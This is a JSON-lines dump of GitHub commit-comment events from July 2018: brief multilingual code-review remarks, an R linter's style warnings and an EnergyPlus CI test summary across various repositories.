{"id":"7933973077","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29633585,"position":18,"line":37,"path":"aco.h","commit_id":"0a33bdd2d786c7ec6b7cc85dfe777326762db5ae","created_at":"2018-07-08T13:46:03Z","updated_at":"2018-07-08T13:46:03Z","author_association":"NONE","body":"* Will this software evolution trigger another adjustment also for such a preprocessor symbol?\r\n* Will any version identifiers be incremented by “merge” commits?"}},"created_at":"2018-07-08T13:46:03Z"}
{"id":"7933975125","type":"CommitCommentEvent","actor":{"login":"wolfbeast"},"repo":{"name":"MoonchildProductions/UXP"},"payload":{"comment":{"id":29633586,"position":null,"line":null,"path":null,"commit_id":"764d0af25ea2c5713958a4b8b8c524b09640a24c","created_at":"2018-07-08T13:47:30Z","updated_at":"2018-07-08T13:47:30Z","author_association":"MEMBER","body":"@janekptacijarabaci Right -- that got reversed. Without the pref it'll break. Update incoming."}},"created_at":"2018-07-08T13:47:30Z"}
{"id":"7933976809","type":"CommitCommentEvent","actor":{"login":"ananthr1"},"repo":{"name":"ananthr1/Anatomy-and-Physiology"},"payload":{"comment":{"id":29633590,"position":null,"line":null,"path":null,"commit_id":"714cdc09fa69cd087f6421917af9f3554694e897","created_at":"2018-07-08T13:48:41Z","updated_at":"2018-07-08T13:48:41Z","author_association":"OWNER","body":"Project Board with Thortspace Sphere\r\nhttps://github.com/ananthr1/Anatomy-and-Physiology/projects/3"}},"created_at":"2018-07-08T13:48:41Z"}
{"id":"7933977641","type":"CommitCommentEvent","actor":{"login":"cardangi"},"repo":{"name":"cardangi/IABE-BugBounty-Framework"},"payload":{"comment":{"id":29633591,"position":null,"line":null,"path":null,"commit_id":"ef6cc8401336f31f28952dbd71aa4b48220bdf1a","created_at":"2018-07-08T13:49:17Z","updated_at":"2018-07-08T13:49:17Z","author_association":"OWNER","body":"Deleting file ._."}},"created_at":"2018-07-08T13:49:17Z"}
{"id":"7933979908","type":"CommitCommentEvent","actor":{"login":"K0H205"},"repo":{"name":"K0H205/second_app"},"payload":{"comment":{"id":29633596,"position":null,"line":null,"path":null,"commit_id":"393715de0960447c9f02006106ad8043aa775ed5","created_at":"2018-07-08T13:50:43Z","updated_at":"2018-07-08T13:50:43Z","author_association":"OWNER","body":"これでOKでしょうか？？"}},"created_at":"2018-07-08T13:50:43Z"}
{"id":"7933980468","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29633597,"position":null,"line":null,"path":null,"commit_id":"e3bdbcf839e285f416158d1a87a20aee504f4cd9","created_at":"2018-07-08T13:51:07Z","updated_at":"2018-07-08T13:51:07Z","author_association":"OWNER","body":"Awesome to see this go in. Now we're just waiting for **tmap**. Any ideas when the latest version is due up on CRAN @Nowosad ? It's coming together - should switch to CRAN versions of RQGIS and spData also I think - any reason for holding our horses and delaying that?"}},"created_at":"2018-07-08T13:51:07Z"}
{"id":"7933985770","type":"CommitCommentEvent","actor":{"login":"BLumia"},"repo":{"name":"oing9179/MusicNotes"},"payload":{"comment":{"id":29633615,"position":9,"line":106,"path":"Music Theory for Computer Musicians Notes/Music Theory for Computer Musicians Notes.md","commit_id":"94a33ad89422c57f0bf2cc6c69871171e5c5f4b6","created_at":"2018-07-08T13:54:52Z","updated_at":"2018-07-08T13:54:52Z","author_association":"NONE","body":"和先"}},"created_at":"2018-07-08T13:54:52Z"}
{"id":"7933986603","type":"CommitCommentEvent","actor":{"login":"Rajyal"},"repo":{"name":"Rajyal/Rajya"},"payload":{"comment":{"id":29633618,"position":null,"line":null,"path":null,"commit_id":"ee2a0ee87d583f31e29329df92acd9fe0e3b3b38","created_at":"2018-07-08T13:55:27Z","updated_at":"2018-07-08T13:55:27Z","author_association":"OWNER","body":"this is for raji training"}},"created_at":"2018-07-08T13:55:27Z"}
{"id":"7933989133","type":"CommitCommentEvent","actor":{"login":"johngf"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29633622,"position":null,"line":null,"path":null,"commit_id":"fd37f9b97e2709731b4a55383bf771cfc5f186c5","created_at":"2018-07-08T13:57:14Z","updated_at":"2018-07-08T13:57:14Z","author_association":"COLLABORATOR","body":"Sks n'est plus hs aujourd'hui. "}},"created_at":"2018-07-08T13:57:14Z"}
{"id":"7933990030","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633623,"position":27,"line":33,"path":"pom.xml","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T13:57:52Z","updated_at":"2018-07-08T13:57:52Z","author_association":"NONE","body":"КРуто, да, что это ушло?)"}},"created_at":"2018-07-08T13:57:52Z"}
{"id":"7933990153","type":"CommitCommentEvent","actor":{"login":"Hussain-2018"},"repo":{"name":"torvalds/linux"},"payload":{"comment":{"id":29633624,"position":null,"line":null,"path":null,"commit_id":"7bced397510ab569d31de4c70b39e13355046387","created_at":"2018-07-08T13:57:58Z","updated_at":"2018-07-08T13:57:58Z","author_association":"NONE","body":"Non"}},"created_at":"2018-07-08T13:57:58Z"}
{"id":"7933991339","type":"CommitCommentEvent","actor":{"login":"rizky12ramadhan"},"repo":{"name":"rizky12ramadhan/GoLife-Test"},"payload":{"comment":{"id":29633626,"position":null,"line":null,"path":null,"commit_id":"bc702a69a6b204bcc16b00e2ac32fbf3f8149189","created_at":"2018-07-08T13:58:48Z","updated_at":"2018-07-08T13:58:48Z","author_association":"OWNER","body":"del"}},"created_at":"2018-07-08T13:58:48Z"}
{"id":"7933991554","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633629,"position":97,"line":74,"path":"pom.xml","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T13:58:58Z","updated_at":"2018-07-08T13:58:58Z","author_association":"NONE","body":"Это можно не добавлять - у Вам все релизные версии."}},"created_at":"2018-07-08T13:58:58Z"}
{"id":"7933992559","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633636,"position":5,"line":18,"path":"src/main/java/com/otus/spring/dao/MessageHolderImpl.java","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T13:59:39Z","updated_at":"2018-07-08T13:59:39Z","author_association":"NONE","body":"Так, а вот это хотелось бы ConfigurattionProperties как раз заменить."}},"created_at":"2018-07-08T13:59:39Z"}
{"id":"7933993386","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633640,"position":12,"line":12,"path":"src/main/resources/banner.txt","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:00:11Z","updated_at":"2018-07-08T14:00:11Z","author_association":"NONE","body":"КРутяк!"}},"created_at":"2018-07-08T14:00:11Z"}
{"id":"7933994053","type":"CommitCommentEvent","actor":{"login":"dmitrykorbcon1"},"repo":{"name":"dmitrykorbcon1/cleanrepository"},"payload":{"comment":{"id":29633646,"position":null,"line":null,"path":null,"commit_id":"4dfc2c2157be595fa86ed43dbffed65218118635","created_at":"2018-07-08T14:00:31Z","updated_at":"2018-07-08T14:00:31Z","author_association":"OWNER","body":"Прописаны абсолютные пути к файлам, исправлены ошибки, связанные с пустыми полями формы при передаче из них значений, поправлено оформление кода, убрано лишнее."}},"created_at":"2018-07-08T14:00:31Z"}
{"id":"7933994374","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633648,"position":2,"line":2,"path":"src/main/resources/application.yaml","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:00:43Z","updated_at":"2018-07-08T14:00:43Z","author_association":"NONE","body":"Если нет специальных символов. то можно не ставить кавычки."}},"created_at":"2018-07-08T14:00:43Z"}
{"id":"7933995866","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633652,"position":12,"line":12,"path":"src/test/java/com/otus/spring/MainTestData.java","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:01:38Z","updated_at":"2018-07-08T14:01:38Z","author_association":"NONE","body":"Я понял, что Вы хотитет, но это делается другим сопособом. Расскажу во вторник."}},"created_at":"2018-07-08T14:01:38Z"}
{"id":"7933996440","type":"CommitCommentEvent","actor":{"login":"yakamok"},"repo":{"name":"yakamok/ygg-node-db"},"payload":{"comment":{"id":29633654,"position":null,"line":null,"path":null,"commit_id":"f8fbea016ff711c95703166302df297e55de0959","created_at":"2018-07-08T14:02:01Z","updated_at":"2018-07-08T14:02:01Z","author_association":"OWNER","body":"added exception and started adding the timestamp in the database instead of python"}},"created_at":"2018-07-08T14:02:01Z"}
{"id":"7933998102","type":"CommitCommentEvent","actor":{"login":"LordVenom"},"repo":{"name":"Kodi-vStream/venom-xbmc-addons"},"payload":{"comment":{"id":29633656,"position":null,"line":null,"path":null,"commit_id":"fd37f9b97e2709731b4a55383bf771cfc5f186c5","created_at":"2018-07-08T14:03:11Z","updated_at":"2018-07-08T14:03:11Z","author_association":"COLLABORATOR","body":"ok je les reactiver"}},"created_at":"2018-07-08T14:03:11Z"}
{"id":"7933998459","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633657,"position":12,"line":12,"path":"src/test/java/com/otus/spring/MainTestData.java","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:03:25Z","updated_at":"2018-07-08T14:03:25Z","author_association":"NONE","body":"Но пустых тестов не должно быть -их нужно делать конфигурациями."}},"created_at":"2018-07-08T14:03:25Z"}
{"id":"7933998692","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633658,"position":12,"line":12,"path":"src/test/java/com/otus/spring/service/TestServiceData.java","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:03:35Z","updated_at":"2018-07-08T14:03:35Z","author_association":"NONE","body":"Непонятно, как это работает - вот здесь должен быть `@RunWith`"}},"created_at":"2018-07-08T14:03:35Z"}
{"id":"7934000027","type":"CommitCommentEvent","actor":{"login":"pozmu"},"repo":{"name":"bitcoin-abe/bitcoin-abe"},"payload":{"comment":{"id":29633659,"position":4,"line":25,"path":"README-MYSQL.txt","commit_id":"b1300e653c102b524a227882ba4e3b3263bf43f3","created_at":"2018-07-08T14:04:30Z","updated_at":"2018-07-08T14:04:30Z","author_association":"NONE","body":"Didn't work on Ubuntu 16:\r\nERROR 1133 (42000): Can't find any matching row in the user table"}},"created_at":"2018-07-08T14:04:30Z"}
{"id":"7934000272","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633660,"position":9,"line":9,"path":"src/test/resources/application.yaml","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:04:41Z","updated_at":"2018-07-08T14:04:41Z","author_association":"NONE","body":"А вот пустую строчку в конце фалйа с пропертями лучше вставлять - SnakeYAML, использющийся в SpringBoot это проглотит, а вот другие библиотеки - нет."}},"created_at":"2018-07-08T14:04:41Z"}
{"id":"7934000556","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"pyltsin/otus-spring"},"payload":{"comment":{"id":29633661,"position":24,"line":24,"path":"src/test/java/com/otus/spring/service/TestServiceData.java","commit_id":"f6591cd199b73f7ef6e06b9a2d7e43f3cab33252","created_at":"2018-07-08T14:04:54Z","updated_at":"2018-07-08T14:04:54Z","author_association":"NONE","body":"Прекрасный тест"}},"created_at":"2018-07-08T14:04:54Z"}
{"id":"7934001269","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29633666,"position":null,"line":null,"path":null,"commit_id":"e1826ac04d141562556eb0865c59ee076bfade9a","created_at":"2018-07-08T14:05:23Z","updated_at":"2018-07-08T14:05:23Z","author_association":"OWNER","body":"\r\n![widok1](https://user-images.githubusercontent.com/6593648/42420602-a571e898-82c8-11e8-9d51-a6e5e1be3827.jpg)\r\ncommit index"}},"created_at":"2018-07-08T14:05:23Z"}
{"id":"7934001784","type":"CommitCommentEvent","actor":{"login":"qzwxecrvtbyn"},"repo":{"name":"qzwxecrvtbyn/firstwork"},"payload":{"comment":{"id":29633667,"position":null,"line":null,"path":null,"commit_id":"1b6eac938ffc27196ea3cb49e2fe6f59b5aaa9d3","created_at":"2018-07-08T14:05:45Z","updated_at":"2018-07-08T14:05:45Z","author_association":"OWNER","body":"I like laravel framework.\r\nI am building e-Cormence site"}},"created_at":"2018-07-08T14:05:45Z"}
{"id":"7934002855","type":"CommitCommentEvent","actor":{"login":"KihongHeo"},"repo":{"name":"KihongHeo/ftpserver"},"payload":{"comment":{"id":29633669,"position":339,"line":339,"path":"src/org/apache/ftpserver/RequestHandler.java","commit_id":"284214378239aef601cefdf2c9b7c83af58611fc","created_at":"2018-07-08T14:06:30Z","updated_at":"2018-07-08T14:06:30Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-08T14:06:30Z"}
{"id":"7934004198","type":"CommitCommentEvent","actor":{"login":"PradeepaJey1"},"repo":{"name":"PradeepaJey1/Ballerina-SQLdatabase-interactions-with-twitter-service"},"payload":{"comment":{"id":29633670,"position":null,"line":null,"path":null,"commit_id":"350c5c31a14925b7384f05351ea3b0adb14409ac","created_at":"2018-07-08T14:07:27Z","updated_at":"2018-07-08T14:07:27Z","author_association":"OWNER","body":"SQL file of the databse"}},"created_at":"2018-07-08T14:07:27Z"}
{"id":"7934005798","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"ropensci/rdefra"},"payload":{"comment":{"id":29633674,"position":null,"line":null,"path":null,"commit_id":"9f749b562d497896ec5314b008747a7777ce7de4","created_at":"2018-07-08T14:08:36Z","updated_at":"2018-07-08T14:08:36Z","author_association":"NONE","body":"[R/ukair_get_coords.R:38:1:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/R/ukair_get_coords.R#L38) *style:* **Variable or function name should be snake_case.**\n```r\n​ukair_get_coords.default <- function(ids) {\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ukair_get_coords.R:43:1:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/R/ukair_get_coords.R#L43) *style:* **Variable or function name should be snake_case.**\n```r\n​ukair_get_coords.character <- function(ids){\n^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ukair_get_coords.R:53:1:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/R/ukair_get_coords.R#L53) *style:* **Variable or function name should be snake_case.**\n```r\n​ukair_get_coords.data.frame <- function(ids){\n^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ukair_get_coords.R:139:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/R/ukair_get_coords.R#L139) *style:* **Variable or function name should be snake_case.**\n```r\n​  en_DF <- data.frame(t(sapply(id_s, ukair_get_coords_internal)))\n  ^~~~~\n```\n[R/ukair_get_hourly_data.R:133:8:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/R/ukair_get_hourly_data.R#L133) *style:* **Variable or function name should be snake_case.**\n```r\n​    df$Date <- as.character(df$Date)\n       ^~~~\n```\n[tests/testthat/test-data.R:8:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L8) *style:* **Variable or function name should be snake_case.**\n```r\n​  rootURL <- \"https://uk-air.defra.gov.uk/data_files/site_data/\"\n  ^~~~~~~\n```\n[tests/testthat/test-data.R:9:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L9) *style:* **Variable or function name should be snake_case.**\n```r\n​  myURL <- paste(rootURL, site_id, \"_\", years, \".csv\", sep = \"\")\n  ^~~~~\n```\n[tests/testthat/test-data.R:22:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L22) *style:* **Variable or function name should be snake_case.**\n```r\n​  rootURL <- \"https://uk-air.defra.gov.uk/data_files/site_data/\"\n  ^~~~~~~\n```\n[tests/testthat/test-data.R:23:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L23) *style:* **Variable or function name should be snake_case.**\n```r\n​  myURL <- paste(rootURL, site_id, \"_\", years, \".csv\", sep = \"\")\n  ^~~~~\n```\n[tests/testthat/test-data.R:25:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L25) *style:* **Variable or function name should be snake_case.**\n```r\n​  con.url <- try(url(myURL[[1]]))\n  ^~~~~~~\n```\n[tests/testthat/test-data.R:69:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L69) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,1], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:76:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L76) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,2], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:83:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L83) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,3], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:88:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L88) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,4], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:93:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L93) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,5], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:98:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L98) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,6], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:103:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L103) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,7], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:108:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L108) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,8], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:113:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L113) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,9], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:117:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L117) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,10], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:122:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L122) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,11], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-data.R:127:19:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-data.R#L127) *style:* **Commas should always have a space after.**\n```r\n​  expect_that(x[1,12], equals(structure(list(\n                  ^\n```\n[tests/testthat/test-metadata.R:26:5:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-metadata.R#L26) *style:* **Commented code should be removed.**\n```r\n​  # URL: catalogue_fetch[[1]]\n    ^~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-metadata.R:90:3:](https://github.com/ropensci/rdefra/blob/9f749b562d497896ec5314b008747a7777ce7de4/tests/testthat/test-metadata.R#L90) *style:* **Variable or function name should be snake_case.**\n```r\n​  IDs <- c(\"UKA15910\", \"UKA15956\", \"UKA16663\", \"UKA16097\")\n  ^~~\n```"}},"created_at":"2018-07-08T14:08:36Z"}
{"id":"7934007962","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633683,"position":null,"line":null,"path":null,"commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:10:09Z","updated_at":"2018-07-08T14:10:09Z","author_association":"MEMBER","body":"В одном файле 2 тестовых класса - это нехорошо. Вынесите в отдельные файлы."}},"created_at":"2018-07-08T14:10:09Z"}
{"id":"7934008110","type":"CommitCommentEvent","actor":{"login":"i066088"},"repo":{"name":"i066088/build-gcc7.3"},"payload":{"comment":{"id":29633684,"position":null,"line":null,"path":null,"commit_id":"6896ba0a3a1f2765443e862e37f0cd5a34482c71","created_at":"2018-07-08T14:10:14Z","updated_at":"2018-07-08T14:10:14Z","author_association":"OWNER","body":"How to build gcc7.3 from the source code by a lower gcc version, e.g. gcc4.8"}},"created_at":"2018-07-08T14:10:14Z"}
{"id":"7934009143","type":"CommitCommentEvent","actor":{"login":"hnes"},"repo":{"name":"hnes/libaco"},"payload":{"comment":{"id":29633687,"position":18,"line":37,"path":"aco.h","commit_id":"0a33bdd2d786c7ec6b7cc85dfe777326762db5ae","created_at":"2018-07-08T14:11:00Z","updated_at":"2018-07-08T14:11:00Z","author_association":"OWNER","body":"> Will this software evolution trigger another adjustment also for such a preprocessor symbol?\r\n\r\nDoes this kind of adjustment matters for application?\r\n\r\n> Will any version identifiers be incremented by “merge” commits?\r\n\r\nMaybe I don't get your meaning about “merge” commits. Could you explain it further ?"}},"created_at":"2018-07-08T14:11:00Z"}
{"id":"7934009409","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633688,"position":27,"line":23,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:11:11Z","updated_at":"2018-07-08T14:11:11Z","author_association":"MEMBER","body":"Перепутаны аргументы у Assert.Equals"}},"created_at":"2018-07-08T14:11:11Z"}
{"id":"7934009943","type":"CommitCommentEvent","actor":{"login":"hechaozong"},"repo":{"name":"hechaozong/hello-chao"},"payload":{"comment":{"id":29633690,"position":null,"line":null,"path":null,"commit_id":"59ce49d7db4ba092345bd14c060696f28bd10418","created_at":"2018-07-08T14:11:33Z","updated_at":"2018-07-08T14:11:33Z","author_association":"OWNER","body":"very good"}},"created_at":"2018-07-08T14:11:33Z"}
{"id":"7934010377","type":"CommitCommentEvent","actor":{"login":"ydvorzhetskiy"},"repo":{"name":"yetoneya92/otus-springframework-2018-06-elena"},"payload":{"comment":{"id":29633691,"position":35,"line":35,"path":"StudentIQTest/pom.xml","commit_id":"51bc09764e8aaecf7ab37601409a90d7367f5e58","created_at":"2018-07-08T14:11:51Z","updated_at":"2018-07-08T14:11:51Z","author_association":"NONE","body":"ох ничего себе!"}},"created_at":"2018-07-08T14:11:51Z"}
{"id":"7934010976","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"antretterf/EnergyPlus"},"payload":{"comment":{"id":29633692,"position":null,"line":null,"path":null,"commit_id":"f3da7217b803b6bc1de06c6a9e9884b017ba381c","created_at":"2018-07-08T14:12:14Z","updated_at":"2018-07-08T14:12:14Z","author_association":"NONE","body":"HAMT1_180406 (antretterf) - Win64-Windows-7-VisualStudio-14: OK (2920 of 2928 tests passed, 14 test warnings)\n\nMessages:\n\n * 13 tests had: AUD diffs.\n * 11 tests had: EIO diffs.\n * 3 tests had: ESO small diffs.\n * 3 tests had: Table small diffs.\n * 1 test had: BND diffs.\n * 8 tests had: ESO big diffs.\n * 6 tests had: Table big diffs.\n * 2 tests had: MTD diffs.\n * 3 tests had: MTR big diffs.\n * 2 tests had: MTR small diffs.\n * 1 test had: ERR diffs.\n * 1 test had: SSZ big diffs.\n * 1 test had: ZSZ big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 617\n * Failed: 8\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-Win64-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f3da7217b803b6bc1de06c6a9e9884b017ba381c-PR6715-Win64-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.73%25-yellow.png)</a> \n"}},"created_at":"2018-07-08T14:12:14Z"}
{"id":"7934011327","type":"CommitCommentEvent","actor":{"login":"JarekParal"},"repo":{"name":"RoboticsBrno/RoboticsBrno-guides"},"payload":{"comment":{"id":29633693,"position":24,"line":243,"path":"RoboticsManual/software.tex","commit_id":"53cbea5cb9b8b926f25dfe0e7b915f499efbb124","created_at":"2018-07-08T14:12:26Z","updated_at":"2018-07-08T14:12:26Z","author_association":"MEMBER","body":"@MiroslavBurda `git add .` přidá všechny soubory/změny v aktuálním adresáři. `git add --all` přidá všechny soubory/změny v daném repozitáři. Tuto metodu ale nedoporučujeme, protože se tak přidají i dočasné soubory (`tmp`) a soubory, které většinou nechceš verzovat (všechny generované soubory - např. build adresář, `.pioenvs`, ...)."}},"created_at":"2018-07-08T14:12:26Z"}
{"id":"7934011441","type":"CommitCommentEvent","actor":{"login":"MendezBruno"},"repo":{"name":"MendezBruno/template-angular"},"payload":{"comment":{"id":29633694,"position":11,"line":12,"path":"src/app/vistas/forms/user-google-maps/user-google-maps.component.html","commit_id":"25a4a7fc6fadc748cf686dc0e4727d9da03fe022","created_at":"2018-07-08T14:12:31Z","updated_at":"2018-07-08T14:12:31Z","author_association":"OWNER","body":"Angular tiene sus propias herramientas para agregar eventos a los elementos. Podes sacar el id='botonValiadar\" y poner (click) = \"unMetodo()\" y luego en el .ts definis el metodo. Por ejemplo: unMetedo() { preventDefault() } y te ahorras todo el bind del elemento con el id usando las bondades de angular."}},"created_at":"2018-07-08T14:12:31Z"}
{"id":"7934011731","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633695,"position":31,"line":26,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:12:42Z","updated_at":"2018-07-08T14:12:42Z","author_association":"MEMBER","body":"Тест плохо читается. Переменная relevantData объявлена в Arrange, но на самом деле это Assert.\r\nТакие переменные только мешают. Напишите тест, чтобы в Assert было явное значение, которое мы ожидаем. Без переменных, без интерполяций. Только данные."}},"created_at":"2018-07-08T14:12:42Z"}
{"id":"7934011825","type":"CommitCommentEvent","actor":{"login":"otyaken"},"repo":{"name":"otyaken/report2"},"payload":{"comment":{"id":29633696,"position":7,"line":8,"path":"statistics_s.py","commit_id":"974a11c0a8c396d4a5166519a03a3fa3fabbecd3","created_at":"2018-07-08T14:12:45Z","updated_at":"2018-07-08T14:12:45Z","author_association":"OWNER","body":"This code contained a bug."}},"created_at":"2018-07-08T14:12:45Z"}
{"id":"7934012739","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29633698,"position":72,"line":51,"path":"Dodo.Core.Test/CityDepartmentTest.cs","commit_id":"1b333e98bc06e3c6aa3c2ef43dd7c3b8a0f31c20","created_at":"2018-07-08T14:13:23Z","updated_at":"2018-07-08T14:13:23Z","author_association":"MEMBER","body":"Почему не Assert.False?"}},"created_at":"2018-07-08T14:13:23Z"}
{"id":"7934015333","type":"CommitCommentEvent","actor":{"login":"ozank"},"repo":{"name":"mesutto/IMMD"},"payload":{"comment":{"id":29633701,"position":null,"line":null,"path":null,"commit_id":"4c268bfa97453b48839671d3103ee2de7e75acff","created_at":"2018-07-08T14:15:08Z","updated_at":"2018-07-08T14:15:08Z","author_association":"COLLABORATOR","body":"Eline sağlık\r\nBu kadar çok delik olacak mıydı ya? Eğer PCB'ye montaj içinse through all delik yerine sadece heatsink'in ana gövdesine arkadan çıkmayacak yivli delik de açabiliriz.\r\nBir de kulakların çapıı birşeye sabitlemediysen biraz daha kısa olabilirler.\r\n\r\nGörüşürüz\r\n"}},"created_at":"2018-07-08T14:15:08Z"}
